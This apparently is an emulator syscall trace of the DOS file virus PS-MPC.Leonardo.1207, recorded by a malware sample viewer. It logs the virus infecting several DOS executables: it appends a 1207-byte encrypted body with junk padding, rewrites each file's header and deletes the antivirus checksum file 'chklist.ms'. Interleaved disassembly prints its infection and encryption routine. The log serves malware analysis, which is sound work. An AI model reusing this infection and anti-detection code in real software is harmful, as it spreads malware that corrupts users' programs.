Sample viewer

vx.netlux.org/Virus.DOS.PS-MPC.Leonardo.1207


Syscalls:

Time | Syscall Op (the INT 21h function number in AH, shown in decimal; e.g. 44 = 0x2c, 64 = 0x40) | PC | Syscall Name
2018-12-17T22:48:45.848875328Z 25 PC: 15198 | Get default drive
2018-12-17T22:48:45.85831974Z 71 PC: 151a7 | Get current directory
2018-12-17T22:48:45.861196068Z 26 PC: 153fd | Set disk transfer address
2018-12-17T22:48:45.862511686Z 78 PC: 15408 | Find first file
2018-12-17T22:48:45.869092253Z 67 PC: 1542b | Get or set file attributes
2018-12-17T22:48:45.875936853Z 67 PC: 15433 | Get or set file attributes
2018-12-17T22:48:45.89970014Z 61 PC: 15438 | Open file (Filename = 'TEST.EXE')
2018-12-17T22:48:45.912003768Z 87 PC: 1543e | Get or set file date and time
2018-12-17T22:48:45.913363772Z 63 PC: 15455 | Read file or device (Read 26 bytes on handle 5)
2018-12-17T22:48:45.920031502Z 66 PC: 154a6 | Move file pointer
2018-12-17T22:48:45.923013597Z 44 PC: 1550b | Get time 0x1550b: mov cx, 8
0x1550e: lea di, word ptr [bp + 0x555]
0x15512: inc di
0x15513: shl dx, 1
0x15515: jb 0x1551e
0x15517: mov word ptr [di], 0xf8
0x1551b: jmp 0x15522
0x1551d: nop
0x1551e: mov word ptr [di], 0xfc
0x15522: loop 0x15512
0x15524: mov ah, 0x2c
0x15526: int 0x21
0x15528: mov cx, 8
0x1552b: inc di
0x1552c: shl dx, 1
0x1552e: jb 0x15537
0x15530: mov word ptr [di], 0x90
0x15534: jmp 0x1553b
0x15536: nop
0x15537: mov word ptr [di], 0xf5
2018-12-17T22:48:45.925134056Z 44 PC: 15528 | Get time 0x15528: mov cx, 8
0x1552b: inc di
0x1552c: shl dx, 1
0x1552e: jb 0x15537
0x15530: mov word ptr [di], 0x90
0x15534: jmp 0x1553b
0x15536: nop
0x15537: mov word ptr [di], 0xf5
0x1553b: loop 0x1552b
0x1553d: mov ah, 0x2c
0x1553f: int 0x21
0x15541: mov cx, dx
0x15543: xor ch, ch
0x15545: and cl, 0xf
0x15548: mov ah, 0x40
0x1554a: lea dx, word ptr [bp + 0x556]
0x1554e: int 0x21
0x15550: jmp 0x15555
0x15552: nop
0x15553: add byte ptr [bx + si], al
2018-12-17T22:48:45.927252395Z 44 PC: 15541 | Get time 0x15541: mov cx, dx
0x15543: xor ch, ch
0x15545: and cl, 0xf
0x15548: mov ah, 0x40
0x1554a: lea dx, word ptr [bp + 0x556]
0x1554e: int 0x21
0x15550: jmp 0x15555
0x15552: nop
0x15553: add byte ptr [bx + si], al
0x15555: mov ah, 0x2c
0x15557: int 0x21
0x15559: mov word ptr ds:[bp + 0x30], dx
0x1555e: call 0x2514a
0x15561: mov ah, 0x40
0x15563: mov cx, 0x4b7
0x15566: lea dx, word ptr [bp + 0x10]
0x1556a: int 0x21
0x1556c: mov ah, 0x2c
0x1556e: int 0x21
0x15570: mov cx, dx
2018-12-17T22:48:45.930413242Z 64 PC: 15550 | Write file or device (Write 5 bytes on handle 5)
2018-12-17T22:48:45.938507778Z 44 PC: 15559 | Get time 0x15559: mov word ptr ds:[bp + 0x30], dx
0x1555e: call 0x2514a
0x15561: mov ah, 0x40
0x15563: mov cx, 0x4b7
0x15566: lea dx, word ptr [bp + 0x10]
0x1556a: int 0x21
0x1556c: mov ah, 0x2c
0x1556e: int 0x21
0x15570: mov cx, dx
0x15572: xor ch, ch
0x15574: and cl, 0x3f
0x15577: mov ah, 0x40
0x15579: int 0x21
0x1557b: call 0x2514a
0x1557e: mov ax, 0x4202
0x15581: xor cx, cx
0x15583: xor dx, dx
0x15585: int 0x21
0x15587: push ax
0x15588: mov cl, 9
2018-12-17T22:48:45.940642312Z 64 PC: 1556c | Write file or device (Write 1207 bytes on handle 5)
2018-12-17T22:48:45.949407201Z 44 PC: 15570 | Get time 0x15570: mov cx, dx
0x15572: xor ch, ch
0x15574: and cl, 0x3f
0x15577: mov ah, 0x40
0x15579: int 0x21
0x1557b: call 0x2514a
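0x1557e: std [Note: each listing is a linear decode of memory as it stood at the logged call. From 0x1557e onward the bytes no longer decode to the instructions shown at the same addresses in the previous entry (mov ax, 0x4202 / xor cx, cx / ...), and the decode differs again for every later file in this trace. Read the lines from here to the end of this entry as transformed data, not as code the sample executes; this is consistent with the region being encoded in memory between the two calls to 0x2514a, though the routine at 0x2514a is not shown in this trace.]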
0x1557f: or ax, word ptr [bx]
0x15581: cmp cl, byte ptr [si - 0x68c6]
0x15585: les sp, ptr [si + 0x59]
0x15588: hlt
0x15589: add byte ptr [bp - 0x691f], dl
0x1558d: ret
0x1558e: mov sp, 0x951a
0x15591: push cx
2018-12-17T22:48:45.951509428Z 64 PC: 1557b | Write file or device (Write 5 bytes on handle 5)
2018-12-17T22:48:45.954374811Z 66 PC: 15587 | Move file pointer
2018-12-17T22:48:45.956016506Z 66 PC: 155a8 | Move file pointer
2018-12-17T22:48:45.958693903Z 64 PC: 155b3 | Write file or device (Write 26 bytes on handle 5)
2018-12-17T22:48:45.962176881Z 67 PC: 15345 | Get or set file attributes
2018-12-17T22:48:45.967969557Z 65 PC: 15349 | Delete file (Filename = 'chklist.ms')
2018-12-17T22:48:45.974227474Z 87 PC: 155cc | Get or set file date and time
2018-12-17T22:48:45.975648003Z 62 PC: 155d0 | Close file
2018-12-17T22:48:45.983558138Z 67 PC: 155da | Get or set file attributes
2018-12-17T22:48:45.995518534Z 79 PC: 1541f | Find next file
2018-12-17T22:48:45.999671781Z 59 PC: 152c0 | Change current directory
2018-12-17T22:48:46.004095214Z 14 PC: 151d5 | Set default drive (Drive = 'C')
2018-12-17T22:48:46.007507637Z 26 PC: 153fd | Set disk transfer address
2018-12-17T22:48:46.008884816Z 78 PC: 15408 | Find first file
2018-12-17T22:48:46.014549152Z 59 PC: 152c0 | Change current directory
2018-12-17T22:48:46.019379805Z 59 PC: 151e0 | Change current directory
2018-12-17T22:48:46.025238952Z 26 PC: 153fd | Set disk transfer address
2018-12-17T22:48:46.026586362Z 78 PC: 15408 | Find first file
2018-12-17T22:48:46.036841802Z 67 PC: 1542b | Get or set file attributes
2018-12-17T22:48:46.042662101Z 67 PC: 15433 | Get or set file attributes
2018-12-17T22:48:46.38540042Z 61 PC: 15438 | Open file (Filename = 'ATTRIB.EXE')
2018-12-17T22:48:46.393338204Z 87 PC: 1543e | Get or set file date and time
2018-12-17T22:48:46.396505863Z 63 PC: 15455 | Read file or device (Read 26 bytes on handle 5)
2018-12-17T22:48:46.402979813Z 66 PC: 154a6 | Move file pointer
2018-12-17T22:48:46.405701418Z 44 PC: 1550b | Get time 0x1550b: mov cx, 8
0x1550e: lea di, word ptr [bp + 0x555]
0x15512: inc di
0x15513: shl dx, 1
0x15515: jb 0x1551e
0x15517: mov word ptr [di], 0xf8
0x1551b: jmp 0x15522
0x1551d: nop
0x1551e: mov word ptr [di], 0xfc
0x15522: loop 0x15512
0x15524: mov ah, 0x2c
0x15526: int 0x21
0x15528: mov cx, 8
0x1552b: inc di
0x1552c: shl dx, 1
0x1552e: jb 0x15537
0x15530: mov word ptr [di], 0x90
0x15534: jmp 0x1553b
0x15536: nop
0x15537: mov word ptr [di], 0xf5
2018-12-17T22:48:46.408223401Z 44 PC: 15528 | Get time 0x15528: mov cx, 8
0x1552b: inc di
0x1552c: shl dx, 1
0x1552e: jb 0x15537
0x15530: mov word ptr [di], 0x90
0x15534: jmp 0x1553b
0x15536: nop
0x15537: mov word ptr [di], 0xf5
0x1553b: loop 0x1552b
0x1553d: mov ah, 0x2c
0x1553f: int 0x21
0x15541: mov cx, dx
0x15543: xor ch, ch
0x15545: and cl, 0xf
0x15548: mov ah, 0x40
0x1554a: lea dx, word ptr [bp + 0x556]
0x1554e: int 0x21
0x15550: jmp 0x15555
0x15552: nop
0x15553: add byte ptr [bx + si], al
2018-12-17T22:48:46.410439921Z 44 PC: 15541 | Get time 0x15541: mov cx, dx
0x15543: xor ch, ch
0x15545: and cl, 0xf
0x15548: mov ah, 0x40
0x1554a: lea dx, word ptr [bp + 0x556]
0x1554e: int 0x21
0x15550: jmp 0x15555
0x15552: nop
0x15553: add byte ptr [bx + si], al
0x15555: mov ah, 0x2c
0x15557: int 0x21
0x15559: mov word ptr ds:[bp + 0x30], dx
0x1555e: call 0x2514a
0x15561: mov ah, 0x40
0x15563: mov cx, 0x4b7
0x15566: lea dx, word ptr [bp + 0x10]
0x1556a: int 0x21
0x1556c: mov ah, 0x2c
0x1556e: int 0x21
0x15570: mov cx, dx
2018-12-17T22:48:46.413378758Z 64 PC: 15550 | Write file or device (Write 0 bytes on handle 5)
2018-12-17T22:48:46.420466117Z 44 PC: 15559 | Get time 0x15559: mov word ptr ds:[bp + 0x30], dx
0x1555e: call 0x2514a
0x15561: mov ah, 0x40
0x15563: mov cx, 0x4b7
0x15566: lea dx, word ptr [bp + 0x10]
0x1556a: int 0x21
0x1556c: mov ah, 0x2c
0x1556e: int 0x21
0x15570: mov cx, dx
0x15572: xor ch, ch
0x15574: and cl, 0x3f
0x15577: mov ah, 0x40
0x15579: int 0x21
0x1557b: call 0x2514a
0x1557e: mov ax, 0x4202
0x15581: xor cx, cx
0x15583: xor dx, dx
0x15585: int 0x21
0x15587: push ax
0x15588: mov cl, 9
2018-12-17T22:48:46.422816752Z 64 PC: 1556c | Write file or device (Write 1207 bytes on handle 5)
2018-12-17T22:48:46.433742392Z 44 PC: 15570 | Get time 0x15570: mov cx, dx
0x15572: xor ch, ch
0x15574: and cl, 0x3f
0x15577: mov ah, 0x40
0x15579: int 0x21
0x1557b: call 0x2514a
0x1557e: call 0x1678c
0x15581: cmp bl, byte ptr [bx + di - 0x7dc6]
0x15585: les si, ptr [bx + di + 0x59]
0x15588: loope 0x1558a
0x1558a: and cx, 0xff83
0x1558d: ret
0x1558e: test ax, 0x801a
0x15591: push cx
0x15592: shr ch, 1
0x15594: push cx
0x15595: aaa
0x15596: fstp dword ptr [bx + 0xd83]
0x1559a: outsb dx, byte ptr [si]
0x1559b: adc dh, 0xd8
2018-12-17T22:48:46.43626571Z 64 PC: 1557b | Write file or device (Write 16 bytes on handle 5)
2018-12-17T22:48:46.439652123Z 66 PC: 15587 | Move file pointer
2018-12-17T22:48:46.441517032Z 66 PC: 155a8 | Move file pointer
2018-12-17T22:48:46.443848419Z 64 PC: 155b3 | Write file or device (Write 26 bytes on handle 5)
2018-12-17T22:48:46.446596996Z 67 PC: 15345 | Get or set file attributes
2018-12-17T22:48:46.45600052Z 65 PC: 15349 | Delete file (Filename = 'chklist.ms')
2018-12-17T22:48:46.463333262Z 87 PC: 155cc | Get or set file date and time
2018-12-17T22:48:46.464965617Z 62 PC: 155d0 | Close file
2018-12-17T22:48:46.472019444Z 67 PC: 155da | Get or set file attributes
2018-12-17T22:48:46.482558789Z 79 PC: 1541f | Find next file
2018-12-17T22:48:46.486192612Z 67 PC: 1542b | Get or set file attributes
2018-12-17T22:48:46.492158348Z 67 PC: 15433 | Get or set file attributes
2018-12-17T22:48:46.502176534Z 61 PC: 15438 | Open file (Filename = 'CHKDSK.EXE')
2018-12-17T22:48:46.508772523Z 87 PC: 1543e | Get or set file date and time
2018-12-17T22:48:46.510118549Z 63 PC: 15455 | Read file or device (Read 26 bytes on handle 5)
2018-12-17T22:48:46.516624765Z 66 PC: 154a6 | Move file pointer
2018-12-17T22:48:46.518105882Z 44 PC: 1550b | Get time 0x1550b: mov cx, 8
0x1550e: lea di, word ptr [bp + 0x555]
0x15512: inc di
0x15513: shl dx, 1
0x15515: jb 0x1551e
0x15517: mov word ptr [di], 0xf8
0x1551b: jmp 0x15522
0x1551d: nop
0x1551e: mov word ptr [di], 0xfc
0x15522: loop 0x15512
0x15524: mov ah, 0x2c
0x15526: int 0x21
0x15528: mov cx, 8
0x1552b: inc di
0x1552c: shl dx, 1
0x1552e: jb 0x15537
0x15530: mov word ptr [di], 0x90
0x15534: jmp 0x1553b
0x15536: nop
0x15537: mov word ptr [di], 0xf5
2018-12-17T22:48:46.520129412Z 44 PC: 15528 | Get time 0x15528: mov cx, 8
0x1552b: inc di
0x1552c: shl dx, 1
0x1552e: jb 0x15537
0x15530: mov word ptr [di], 0x90
0x15534: jmp 0x1553b
0x15536: nop
0x15537: mov word ptr [di], 0xf5
0x1553b: loop 0x1552b
0x1553d: mov ah, 0x2c
0x1553f: int 0x21
0x15541: mov cx, dx
0x15543: xor ch, ch
0x15545: and cl, 0xf
0x15548: mov ah, 0x40
0x1554a: lea dx, word ptr [bp + 0x556]
0x1554e: int 0x21
0x15550: jmp 0x15555
0x15552: nop
0x15553: add byte ptr [bx + si], al
2018-12-17T22:48:46.522652343Z 44 PC: 15541 | Get time 0x15541: mov cx, dx
0x15543: xor ch, ch
0x15545: and cl, 0xf
0x15548: mov ah, 0x40
0x1554a: lea dx, word ptr [bp + 0x556]
0x1554e: int 0x21
0x15550: jmp 0x15555
0x15552: nop
0x15553: add byte ptr [bx + si], al
0x15555: mov ah, 0x2c
0x15557: int 0x21
0x15559: mov word ptr ds:[bp + 0x30], dx
0x1555e: call 0x2514a
0x15561: mov ah, 0x40
0x15563: mov cx, 0x4b7
0x15566: lea dx, word ptr [bp + 0x10]
0x1556a: int 0x21
0x1556c: mov ah, 0x2c
0x1556e: int 0x21
0x15570: mov cx, dx
2018-12-17T22:48:46.524605787Z 64 PC: 15550 | Write file or device (Write 11 bytes on handle 5)
2018-12-17T22:48:46.53077677Z 44 PC: 15559 | Get time 0x15559: mov word ptr ds:[bp + 0x30], dx
0x1555e: call 0x2514a
0x15561: mov ah, 0x40
0x15563: mov cx, 0x4b7
0x15566: lea dx, word ptr [bp + 0x10]
0x1556a: int 0x21
0x1556c: mov ah, 0x2c
0x1556e: int 0x21
0x15570: mov cx, dx
0x15572: xor ch, ch
0x15574: and cl, 0x3f
0x15577: mov ah, 0x40
0x15579: int 0x21
0x1557b: call 0x2514a
0x1557e: mov ax, 0x4202
0x15581: xor cx, cx
0x15583: xor dx, dx
0x15585: int 0x21
0x15587: push ax
0x15588: mov cl, 9
2018-12-17T22:48:46.534075319Z 64 PC: 1556c | Write file or device (Write 1207 bytes on handle 5)
2018-12-17T22:48:46.542408531Z 44 PC: 15570 | Get time 0x15570: mov cx, dx
0x15572: xor ch, ch
0x15574: and cl, 0x3f
0x15577: mov ah, 0x40
0x15579: int 0x21
0x1557b: call 0x2514a
0x1557e: jcxz 0x1558b
0x15580: sbb word ptr [bp + si], di
0x15582: xchg ax, dx
0x15583: cmp cl, byte ptr [bx + di + 0x7ac4]
0x15587: pop cx
0x15588: ljmp 0x88e1:0x8800
0x1558d: ret
0x1558e: mov byte ptr [0x8b1a], al
0x15591: push cx
0x15592: fucomi st(5)
0x15594: pop dx
0x15595: aaa
0x15596: rcr byte ptr [bx + 0xd88], cl
0x1559a: sbb ch, 0xd8
2018-12-17T22:48:46.547136191Z 64 PC: 1557b | Write file or device (Write 27 bytes on handle 5)
2018-12-17T22:48:46.551519923Z 66 PC: 15587 | Move file pointer
2018-12-17T22:48:46.553849277Z 66 PC: 155a8 | Move file pointer
2018-12-17T22:48:46.555142185Z 64 PC: 155b3 | Write file or device (Write 26 bytes on handle 5)
2018-12-17T22:48:46.558760698Z 67 PC: 15345 | Get or set file attributes
2018-12-17T22:48:46.565192689Z 65 PC: 15349 | Delete file (Filename = 'chklist.ms')
2018-12-17T22:48:46.571625281Z 87 PC: 155cc | Get or set file date and time
2018-12-17T22:48:46.573964297Z 62 PC: 155d0 | Close file
2018-12-17T22:48:46.5809394Z 67 PC: 155da | Get or set file attributes
2018-12-17T22:48:46.590938812Z 79 PC: 1541f | Find next file
2018-12-17T22:48:46.594813098Z 67 PC: 1542b | Get or set file attributes
2018-12-17T22:48:46.600475311Z 67 PC: 15433 | Get or set file attributes
2018-12-17T22:48:46.609559829Z 61 PC: 15438 | Open file (Filename = 'DEBUG.EXE')
2018-12-17T22:48:46.616428483Z 87 PC: 1543e | Get or set file date and time
2018-12-17T22:48:46.617979098Z 63 PC: 15455 | Read file or device (Read 26 bytes on handle 5)
2018-12-17T22:48:46.623500435Z 66 PC: 154a6 | Move file pointer
2018-12-17T22:48:46.625569097Z 44 PC: 1550b | Get time 0x1550b: mov cx, 8
0x1550e: lea di, word ptr [bp + 0x555]
0x15512: inc di
0x15513: shl dx, 1
0x15515: jb 0x1551e
0x15517: mov word ptr [di], 0xf8
0x1551b: jmp 0x15522
0x1551d: nop
0x1551e: mov word ptr [di], 0xfc
0x15522: loop 0x15512
0x15524: mov ah, 0x2c
0x15526: int 0x21
0x15528: mov cx, 8
0x1552b: inc di
0x1552c: shl dx, 1
0x1552e: jb 0x15537
0x15530: mov word ptr [di], 0x90
0x15534: jmp 0x1553b
0x15536: nop
0x15537: mov word ptr [di], 0xf5
2018-12-17T22:48:46.627622094Z 44 PC: 15528 | Get time 0x15528: mov cx, 8
0x1552b: inc di
0x1552c: shl dx, 1
0x1552e: jb 0x15537
0x15530: mov word ptr [di], 0x90
0x15534: jmp 0x1553b
0x15536: nop
0x15537: mov word ptr [di], 0xf5
0x1553b: loop 0x1552b
0x1553d: mov ah, 0x2c
0x1553f: int 0x21
0x15541: mov cx, dx
0x15543: xor ch, ch
0x15545: and cl, 0xf
0x15548: mov ah, 0x40
0x1554a: lea dx, word ptr [bp + 0x556]
0x1554e: int 0x21
0x15550: jmp 0x15555
0x15552: nop
0x15553: add byte ptr [bx + si], al
2018-12-17T22:48:46.629557544Z 44 PC: 15541 | Get time 0x15541: mov cx, dx
0x15543: xor ch, ch
0x15545: and cl, 0xf
0x15548: mov ah, 0x40
0x1554a: lea dx, word ptr [bp + 0x556]
0x1554e: int 0x21
0x15550: jmp 0x15555
0x15552: nop
0x15553: add byte ptr [bx + si], al
0x15555: mov ah, 0x2c
0x15557: int 0x21
0x15559: mov word ptr ds:[bp + 0x30], dx
0x1555e: call 0x2514a
0x15561: mov ah, 0x40
0x15563: mov cx, 0x4b7
0x15566: lea dx, word ptr [bp + 0x10]
0x1556a: int 0x21
0x1556c: mov ah, 0x2c
0x1556e: int 0x21
0x15570: mov cx, dx
2018-12-17T22:48:46.631961362Z 64 PC: 15550 | Write file or device (Write 0 bytes on handle 5)
2018-12-17T22:48:46.638359781Z 44 PC: 15559 | Get time 0x15559: mov word ptr ds:[bp + 0x30], dx
0x1555e: call 0x2514a
0x15561: mov ah, 0x40
0x15563: mov cx, 0x4b7
0x15566: lea dx, word ptr [bp + 0x10]
0x1556a: int 0x21
0x1556c: mov ah, 0x2c
0x1556e: int 0x21
0x15570: mov cx, dx
0x15572: xor ch, ch
0x15574: and cl, 0x3f
0x15577: mov ah, 0x40
0x15579: int 0x21
0x1557b: call 0x2514a
0x1557e: mov ax, 0x4202
0x15581: xor cx, cx
0x15583: xor dx, dx
0x15585: int 0x21
0x15587: push ax
0x15588: mov cl, 9
2018-12-17T22:48:46.64063681Z 64 PC: 1556c | Write file or device (Write 1207 bytes on handle 5)
2018-12-17T22:48:46.650437373Z 44 PC: 15570 | Get time 0x15570: mov cx, dx
0x15572: xor ch, ch
0x15574: and cl, 0x3f
0x15577: mov ah, 0x40
0x15579: int 0x21
0x1557b: call 0x2514a
0x1557e: fmul dword ptr [bp + di]
0x15580: and bh, byte ptr [bp + si]
0x15582: test ax, 0xb23a
0x15585: les ax, ptr [bx + di + 0x59]
0x15588: rol word ptr [bx + si], 1
0x1558a: mov bl, 0xe1
0x1558c: mov bl, 0xc3
0x1558e: cdq
0x1558f: sbb dh, byte ptr [bx + si - 0x1faf]
0x15593: in ax, dx
0x15594: popaw
0x15595: aaa
0x15596: jmp 0x10938
0x15599: or ax, 0x805e
2018-12-17T22:48:46.652686717Z 64 PC: 1557b | Write file or device (Write 2 bytes on handle 5)
2018-12-17T22:48:46.655623402Z 66 PC: 15587 | Move file pointer
2018-12-17T22:48:46.657515313Z 66 PC: 155a8 | Move file pointer
2018-12-17T22:48:46.658745704Z 64 PC: 155b3 | Write file or device (Write 26 bytes on handle 5)
2018-12-17T22:48:46.661617009Z 67 PC: 15345 | Get or set file attributes
2018-12-17T22:48:46.667905136Z 65 PC: 15349 | Delete file (Filename = 'chklist.ms')
2018-12-17T22:48:46.673618561Z 87 PC: 155cc | Get or set file date and time
2018-12-17T22:48:46.675066191Z 62 PC: 155d0 | Close file
2018-12-17T22:48:46.682622121Z 67 PC: 155da | Get or set file attributes
2018-12-17T22:48:46.691636041Z 79 PC: 1541f | Find next file
2018-12-17T22:48:46.694484249Z 67 PC: 1542b | Get or set file attributes
2018-12-17T22:48:46.700469437Z 67 PC: 15433 | Get or set file attributes
2018-12-17T22:48:46.709493632Z 61 PC: 15438 | Open file (Filename = 'EXPAND.EXE')
2018-12-17T22:48:46.716579743Z 87 PC: 1543e | Get or set file date and time
2018-12-17T22:48:46.718265365Z 63 PC: 15455 | Read file or device (Read 26 bytes on handle 5)
2018-12-17T22:48:46.723570724Z 66 PC: 154a6 | Move file pointer
2018-12-17T22:48:46.724925891Z 44 PC: 1550b | Get time 0x1550b: mov cx, 8
0x1550e: lea di, word ptr [bp + 0x555]
0x15512: inc di
0x15513: shl dx, 1
0x15515: jb 0x1551e
0x15517: mov word ptr [di], 0xf8
0x1551b: jmp 0x15522
0x1551d: nop
0x1551e: mov word ptr [di], 0xfc
0x15522: loop 0x15512
0x15524: mov ah, 0x2c
0x15526: int 0x21
0x15528: mov cx, 8
0x1552b: inc di
0x1552c: shl dx, 1
0x1552e: jb 0x15537
0x15530: mov word ptr [di], 0x90
0x15534: jmp 0x1553b
0x15536: nop
0x15537: mov word ptr [di], 0xf5
2018-12-17T22:48:46.72759051Z 44 PC: 15528 | Get time 0x15528: mov cx, 8
0x1552b: inc di
0x1552c: shl dx, 1
0x1552e: jb 0x15537
0x15530: mov word ptr [di], 0x90
0x15534: jmp 0x1553b
0x15536: nop
0x15537: mov word ptr [di], 0xf5
0x1553b: loop 0x1552b
0x1553d: mov ah, 0x2c
0x1553f: int 0x21
0x15541: mov cx, dx
0x15543: xor ch, ch
0x15545: and cl, 0xf
0x15548: mov ah, 0x40
0x1554a: lea dx, word ptr [bp + 0x556]
0x1554e: int 0x21
0x15550: jmp 0x15555
0x15552: nop
0x15553: add byte ptr [bx + si], al
2018-12-17T22:48:46.729737853Z 44 PC: 15541 | Get time 0x15541: mov cx, dx
0x15543: xor ch, ch
0x15545: and cl, 0xf
0x15548: mov ah, 0x40
0x1554a: lea dx, word ptr [bp + 0x556]
0x1554e: int 0x21
0x15550: jmp 0x15555
0x15552: nop
0x15553: add byte ptr [bx + si], al
0x15555: mov ah, 0x2c
0x15557: int 0x21
0x15559: mov word ptr ds:[bp + 0x30], dx
0x1555e: call 0x2514a
0x15561: mov ah, 0x40
0x15563: mov cx, 0x4b7
0x15566: lea dx, word ptr [bp + 0x10]
0x1556a: int 0x21
0x1556c: mov ah, 0x2c
0x1556e: int 0x21
0x15570: mov cx, dx
2018-12-17T22:48:46.731722697Z 64 PC: 15550 | Write file or device (Write 7 bytes on handle 5)
2018-12-17T22:48:46.738065976Z 44 PC: 15559 | Get time 0x15559: mov word ptr ds:[bp + 0x30], dx
0x1555e: call 0x2514a
0x15561: mov ah, 0x40
0x15563: mov cx, 0x4b7
0x15566: lea dx, word ptr [bp + 0x10]
0x1556a: int 0x21
0x1556c: mov ah, 0x2c
0x1556e: int 0x21
0x15570: mov cx, dx
0x15572: xor ch, ch
0x15574: and cl, 0x3f
0x15577: mov ah, 0x40
0x15579: int 0x21
0x1557b: call 0x2514a
0x1557e: mov ax, 0x4202
0x15581: xor cx, cx
0x15583: xor dx, dx
0x15585: int 0x21
0x15587: push ax
0x15588: mov cl, 9
2018-12-17T22:48:46.740982313Z 64 PC: 1556c | Write file or device (Write 1207 bytes on handle 5)
2018-12-17T22:48:46.748632615Z 44 PC: 15570 | Get time 0x15570: mov cx, dx
0x15572: xor ch, ch
0x15574: and cl, 0x3f
0x15577: mov ah, 0x40
0x15579: int 0x21
0x1557b: call 0x2514a
0x1557e: mov di, 0x4508
0x15581: cmp si, cx
0x15583: cmp bp, dx
2018-12-17T22:48:46.751947423Z 64 PC: 1557b | Write file or device (Write 7 bytes on handle 5)
2018-12-17T22:48:46.754758999Z 66 PC: 15587 | Move file pointer
2018-12-17T22:48:46.756026908Z 66 PC: 155a8 | Move file pointer
2018-12-17T22:48:46.758328218Z 64 PC: 155b3 | Write file or device (Write 26 bytes on handle 5)
2018-12-17T22:48:46.761266027Z 67 PC: 15345 | Get or set file attributes
2018-12-17T22:48:46.784822666Z 65 PC: 15349 | Delete file (Filename = 'chklist.ms')
2018-12-17T22:48:46.79189438Z 87 PC: 155cc | Get or set file date and time
2018-12-17T22:48:46.793562563Z 62 PC: 155d0 | Close file
2018-12-17T22:48:46.801379573Z 67 PC: 155da | Get or set file attributes
2018-12-17T22:48:46.812215516Z 79 PC: 1541f | Find next file
2018-12-17T22:48:46.815343626Z 67 PC: 1542b | Get or set file attributes
2018-12-17T22:48:46.821642215Z 67 PC: 15433 | Get or set file attributes
2018-12-17T22:48:46.832919928Z 61 PC: 15438 | Open file (Filename = 'FDISK.EXE')
2018-12-17T22:48:46.839644094Z 87 PC: 1543e | Get or set file date and time
2018-12-17T22:48:46.841258893Z 63 PC: 15455 | Read file or device (Read 26 bytes on handle 5)
2018-12-17T22:48:46.849631426Z 66 PC: 154a6 | Move file pointer
2018-12-17T22:48:46.851320404Z 44 PC: 1550b | Get time 0x1550b: mov cx, 8
0x1550e: lea di, word ptr [bp + 0x555]
0x15512: inc di
0x15513: shl dx, 1
0x15515: jb 0x1551e
0x15517: mov word ptr [di], 0xf8
0x1551b: jmp 0x15522
0x1551d: nop
0x1551e: mov word ptr [di], 0xfc
0x15522: loop 0x15512
0x15524: mov ah, 0x2c
0x15526: int 0x21
0x15528: mov cx, 8
0x1552b: inc di
0x1552c: shl dx, 1
0x1552e: jb 0x15537
0x15530: mov word ptr [di], 0x90
0x15534: jmp 0x1553b
0x15536: nop
0x15537: mov word ptr [di], 0xf5
2018-12-17T22:48:46.854555685Z 44 PC: 15528 | Get time 0x15528: mov cx, 8
0x1552b: inc di
0x1552c: shl dx, 1
0x1552e: jb 0x15537
0x15530: mov word ptr [di], 0x90
0x15534: jmp 0x1553b
0x15536: nop
0x15537: mov word ptr [di], 0xf5
0x1553b: loop 0x1552b
0x1553d: mov ah, 0x2c
0x1553f: int 0x21
0x15541: mov cx, dx
0x15543: xor ch, ch
0x15545: and cl, 0xf
0x15548: mov ah, 0x40
0x1554a: lea dx, word ptr [bp + 0x556]
0x1554e: int 0x21
0x15550: jmp 0x15555
0x15552: nop
0x15553: add byte ptr [bx + si], al
2018-12-17T22:48:46.858096195Z 44 PC: 15541 | Get time 0x15541: mov cx, dx
0x15543: xor ch, ch
0x15545: and cl, 0xf
0x15548: mov ah, 0x40
0x1554a: lea dx, word ptr [bp + 0x556]
0x1554e: int 0x21
0x15550: jmp 0x15555
0x15552: nop
0x15553: add byte ptr [bx + si], al
0x15555: mov ah, 0x2c
0x15557: int 0x21
0x15559: mov word ptr ds:[bp + 0x30], dx
0x1555e: call 0x2514a
0x15561: mov ah, 0x40
0x15563: mov cx, 0x4b7
0x15566: lea dx, word ptr [bp + 0x10]
0x1556a: int 0x21
0x1556c: mov ah, 0x2c
0x1556e: int 0x21
0x15570: mov cx, dx
2018-12-17T22:48:46.860766443Z 64 PC: 15550 | Write file or device (Write 2 bytes on handle 5)
2018-12-17T22:48:46.867442034Z 44 PC: 15559 | Get time 0x15559: mov word ptr ds:[bp + 0x30], dx
0x1555e: call 0x2514a
0x15561: mov ah, 0x40
0x15563: mov cx, 0x4b7
0x15566: lea dx, word ptr [bp + 0x10]
0x1556a: int 0x21
0x1556c: mov ah, 0x2c
0x1556e: int 0x21
0x15570: mov cx, dx
0x15572: xor ch, ch
0x15574: and cl, 0x3f
0x15577: mov ah, 0x40
0x15579: int 0x21
0x1557b: call 0x2514a
0x1557e: mov ax, 0x4202
0x15581: xor cx, cx
0x15583: xor dx, dx
0x15585: int 0x21
0x15587: push ax
0x15588: mov cl, 9
2018-12-17T22:48:46.871286341Z 64 PC: 1556c | Write file or device (Write 1207 bytes on handle 5)
2018-12-17T22:48:46.878250092Z 44 PC: 15570 | Get time 0x15570: mov cx, dx
0x15572: xor ch, ch
0x15574: and cl, 0x3f
0x15577: mov ah, 0x40
0x15579: int 0x21
0x1557b: call 0x2514a
0x1557e: stosb byte ptr es:[di], al
0x1557f: or byte ptr [bx + si + 0x39], dl
0x15582: fstp xword ptr [bx + di]
0x15584: rol bh, 0x33
0x15587: pop dx
0x15588: mov word ptr [0xc103], ax
0x1558b: loop 0x1554e
0x1558d: shr bl, 0x19
0x15590: ret 0x9252
0x15593: out dx, al
0x15594: adc si, word ptr [si]
0x15596: wait
0x15597: pushf
0x15598: ror word ptr [0x832c], -0x6c
2018-12-17T22:48:46.880383141Z 64 PC: 1557b | Write file or device (Write 18 bytes on handle 5)
2018-12-17T22:48:46.883628029Z 66 PC: 15587 | Move file pointer
2018-12-17T22:48:46.885640975Z 66 PC: 155a8 | Move file pointer
2018-12-17T22:48:46.887156889Z 64 PC: 155b3 | Write file or device (Write 26 bytes on handle 5)
2018-12-17T22:48:46.890164645Z 67 PC: 15345 | Get or set file attributes
2018-12-17T22:48:46.896274041Z 65 PC: 15349 | Delete file (Filename = 'chklist.ms')
2018-12-17T22:48:46.901937626Z 87 PC: 155cc | Get or set file date and time
2018-12-17T22:48:46.903345629Z 62 PC: 155d0 | Close file
2018-12-17T22:48:46.909688766Z 67 PC: 155da | Get or set file attributes
2018-12-17T22:48:46.917141052Z 14 PC: 151e9 | Set default drive (Drive = 'D')
